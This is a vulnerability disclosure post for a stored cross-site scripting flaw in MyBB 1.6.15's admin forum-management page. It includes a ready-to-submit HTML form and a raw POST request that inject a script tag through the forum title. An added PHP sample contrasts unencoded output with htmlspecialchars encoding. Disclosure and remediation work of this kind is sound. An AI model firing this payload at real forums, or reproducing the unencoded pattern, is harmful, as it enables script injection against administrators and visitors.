MyBB 1.6.15 => Admin Panel Stored XSS Cross-Site Scripting

2014-08-31 00:08:18
Posted by: Daisuke Dan

############################################################################################
#
# [+] Exploit: MyBB 1.6.15 => Admin Panel Stored XSS Vulnerability
# [+] Author: Daisuke Dan
# [+] Twitter: http://twitter.com/TheHackersBay
# [+] Mail: [email protected]
# [+] Date: 2014-08-30
# [+] Software Link: http://resources.mybb.com/downloads/mybb_1615.zip
# [+] Vendor Homepage: http://www.mybb.com/
#
############################################################################################

=============
Introduction:
=============
MyBB is the free and open source, intuitive, extensible, and incredibly powerful forum software you've been looking for.

=========
Abstract:
=========
I discovered a stored cross-site scripting vulnerability in the admin panel that allows injecting XSS into forum titles. The XSS works on the index page, the administrator logs page, and the categories management page.

========
Details:
========
Vulnerable Module(s):
[+] name

Vulnerable File(s):
[+] /admin/modules/management.php

Vulnerable Parameter(s):
[+] title


========
Exploit:
========
<title>MyBB 1.6.15 XSS Exploit</title>
<img src="http://i.imgur.com/q4jsOKR.png"><br>
<font color="green" size="5">CMS type:</font><font color="black" size="5"> MyBB</font><br>
<font color="green" size="5">Version:</font><font color="black" size="5"> 1.6.15</font><br>
<font color="green" size="5">Vulnerability Type:</font><font color="black" size="5"> Stored XSS Cross-Site Scripting Vulnerability</font><br>
<font color="green" size="5">Require:</font><font color="black" size="5"> Logged into admin panel</font><br>
<form action="/mybb/admin/index.php?module=forum-management&amp;action=add" method="post">
<input name="type" value="f" class="radio_input" id="forum" checked="checked" type="hidden">
<select name="pid" id="pid" type="hidden"><option value="1"></option></select>
<input type="hidden" name="my_post_key" value="7135b96e157ae6e80968eb018ede9252" />
<input name="title" value="&#39;&quot;><script>alert('1337')</script>" class="text_input" id="title" type="hidden">
<input name="disporder" value="1" class="text_input" id="disporder" type="hidden">
<input value="XSS Exploit" class="submit_button" type="submit">
</form>

====
PoC:
====
POST: http://localhost/mybb/admin/index.php?module=forum-management&action=add
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Referer: http://localhost/mybb/exploit.html
Cookie: acploginattempts=0; mybb[lastvisit]=1409427100; mybb[lastactive]=1409431392; loginattempts=1; mybbuser=1_RsrJwzcb99PNgDASqKpUFGsEfZRsnaYRTD3b4Kz9798g2wv2d2; adminsid=5bbdf6bbcf39077ef0c920a6d6b24234; sid=4b32887045572507f3ec966f28093ea3
X-FORWARDED-FOR: 95.101.0.194
VIA: 23.223.36.212
CLIENT-IP: 23.50.67.36
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

POST: type=f&pid=1&my_post_key=7135b96e157ae6e80968eb018ede9252&title='"><script>alert('1337')</script>&disporder=1

[+] Screens:
Categories management XSS: http://i.imgur.com/ZwFNd9T.png
Administrator logs XSS: http://i.imgur.com/uSzG4zN.png
Index page XSS: http://i.imgur.com/O5W2KAG.png
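
Added example, not part of the original advisory and not MyBB source code: the defect class described above (a stored title printed without HTML encoding) shown beside the output-encoded form, using the title value from the PoC as constructed sample input. The function names and the forum.php?id= link are hypothetical, and the assumption is that the title reaches the page through plain string concatenation.

```php
<?php
declare(strict_types=1);

// Constructed sample input: the title value sent in the PoC request above.
$storedTitle = "'\"><script>alert('1337')</script>";

// Vulnerable pattern: a stored title concatenated into markup unchanged.
function renderRowUnsafe(string $title, int $fid): string
{
    return "<a href=\"forum.php?id={$fid}\" title=\"{$title}\">{$title}</a>";
}

// Encode at output time. ENT_QUOTES converts both quote characters, so the
// value cannot close the attribute; ENT_SUBSTITUTE replaces invalid UTF-8
// instead of returning an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: same markup, every interpolated value encoded.
function renderRowSafe(string $title, int $fid): string
{
    $t = h($title);
    return "<a href=\"forum.php?id={$fid}\" title=\"{$t}\">{$t}</a>";
}

// Audit helper: true when the rendered fragment still contains the raw title
// and that title holds characters that HTML encoding would have changed.
function sinkLeaksMarkup(string $rendered, string $title): bool
{
    return $title !== h($title) && strpos($rendered, $title) !== false;
}

// Render the same stored value through both patterns and report the result.
$rows = [
    'unsafe' => renderRowUnsafe($storedTitle, 1),
    'safe'   => renderRowSafe($storedTitle, 1),
];
foreach ($rows as $label => $html) {
    printf("%-6s leaks=%s  %s\n", $label,
        var_export(sinkLeaksMarkup($html, $storedTitle), true), $html);
}
```

Each of the three views listed under Screens prints the title separately, so the encoding has to be applied at every one of those output points, not only where the title is saved.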

========
Credits:
========
Daisuke Dan (aka Lin Kode) - The Hackers Bay

==========
Greets to:
==========
Raw-x, n3tw0rk, Osanda


Fixes

No fixes
